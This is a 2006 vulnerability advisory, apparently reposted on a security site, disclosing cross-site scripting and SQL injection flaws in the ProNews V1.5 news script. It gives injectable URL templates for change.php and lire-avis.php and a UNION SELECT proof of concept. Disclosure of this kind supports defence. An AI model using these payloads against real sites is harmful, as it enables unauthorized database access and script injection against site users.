ProNews V1.5 XSS & SQL Injection

2006.12.14
Credit: Mr_Kaliman
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

ProNews V1.5 -------------------- Vendor site: http://www.scripthp.com/ Product: ProNews V1.5 Vulnerability: XSS & SQL Injection Vulnerability Credits: Mr_KaLiMaN Reported to Vendor: 01.12.06 Public disclosure: 09.12.06 Description: ------------ XSS permanent: http://[victim]/[script_news_path]/admin/change.php?pseudo=[XSS]&email=" >[XSS]&date=[XSS]&sujet=[XSS]&message=[XSS]&site=">[XSS]<foo &lien=[XSS]&aa=[existing_news_id] XSS non permanent: http://[victim]/[script_news_path]/lire-avis.php?aa=[XSS] SQL Injection Vulnerability: http://[victim]/[script_news_path]/lire-avis.php?aa=[SQL INJECTION] POC: http://[victim]/[script_news_path]/lire-avis.php?aa=1 UNION SELECT null,null,null,null,null FROM [existing_table]--


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top